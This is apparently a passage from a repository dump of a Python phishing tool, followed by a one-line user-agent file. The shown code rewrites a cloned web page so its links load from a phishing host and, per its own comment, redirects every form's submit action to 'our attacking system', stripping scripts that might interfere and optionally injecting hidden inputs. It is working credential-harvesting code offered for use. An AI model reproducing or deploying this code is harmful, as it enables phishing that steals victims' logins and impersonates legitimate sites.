227 |   inputkeypress['onkeypress'] = ''
228 | 
229 | # Loop through all input tags found in HTML response, 
230 | # replace src with full link to script on phish host
231 | for inputer in soup.find_all('input', {"src":True}):
232 |   if re.search('^(http|https|//)', inputer.get('src')) is None:
233 |     if re.search('^\/', inputer.get('src')): 
234 |       inputer['src'] = htype+'://'+domainget+inputer.get('src')
235 |     else:
236 |       inputer['src'] = phishget+inputer.get('src')
237 | 
238 | # Remove any javascript onclicks that might interfere with the form
239 | for formonclick in soup.find_all('form', {"onclick":True}):
240 |   formonclick['onclick'] = ''
241 | 
242 | # Remove any javascript onkeypresses that might interfere with the form
243 | for formkeypress in soup.find_all('form', {"onkeypress":True}):
244 |   formkeypress['onkeypress'] = ''
245 | 
246 | # Loop through all forms found in HTML response, 
247 | # replace action with our attacking system
248 | for form in soup.find_all('form'):
249 |   if re.search('^(http|https|//)', form.get('action')) is None:
250 |     if re.search('^\/', form.get('action')): 
251 |       form['action'] = stype+'://'+hostget+form.get('action')
252 |     else:
253 |       form['action'] = stype+'://'+hostget+'/'+form.get('action')
254 |   else:
255 |     form['action'] = stype+'://'+hostget+'/'+form.get('action').split('/', 1)[1].split('/', 1)[1].split('/', 1)[1]
256 | 
257 |   # If the autofill feature was enabled, then open the autofill file
258 |   # and inject each hidden autofill input type into the form
259 |   if args['autofill'] is not None:
260 |     autofile = open(args['autofill'], 'r')
261 | 
262 |     for line in autofile:
263 |       if re.match('^#', line) is None:
264 |         autoform = soup.new_tag(line)
265 |         form.insert(0, autoform)
266 | 
267 |     autofile.close()
268 | 
269 | phishHtml = soup.prettify(formatter="html")
270 | 
271 | # BeautifulSoup fixes broken HTML, I do not want this to happen for &amp;
272 | phishHtml = re.sub('&amp;', '&', phishHtml)
273 | 
274 | # Rewrite CSS url(), first look for all matches
275 | urlCSS = re.findall(r'url\((.*)\)', phishHtml)
276 | 
277 | # Loop through matches and replace
278 | for urls in urlCSS:
279 |   if re.search('\)', urls):
280 |     urls = urls.split(')')[0]
281 | 
282 |   checkQuotes = re.search('(\'|\")', urls)
283 |   urlValue = ''
284 |   useQuotes = ''
285 | 
286 |   # If quotes were used, remove the as part of the string
287 |   # but add them around the URL
288 |   if checkQuotes is not None:
289 |     urlValue = str(urls)[1:-1]
290 |     useQuotes = '"'
291 |   else:
292 |     urlValue = str(urls)
293 |   
294 |   # If preceeded by a forward slash, remove make sure we do not double slash
295 |   if re.search('^(http|https|//)', urls) is not None:
296 |     if re.search('^\/', urls):
297 |       phishHtml = re.sub('url\('+str(urls)+'\)', 'url('+useQuotes+phishget[:-1]+urlValue+useQuotes+')', phishHtml)
298 |     else:
299 |       phishHtml = re.sub('url\('+str(urls)+'\)', 'url('+useQuotes+phishget+urlValue+useQuotes+')', phishHtml)
300 | 
301 | phishWrite = open(phishfile, 'w')
302 | phishWrite.write(phishHtml.encode('utf-8').strip())
303 | phishWrite.close()


--------------------------------------------------------------------------------
/ua.txt:
--------------------------------------------------------------------------------
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)


--------------------------------------------------------------------------------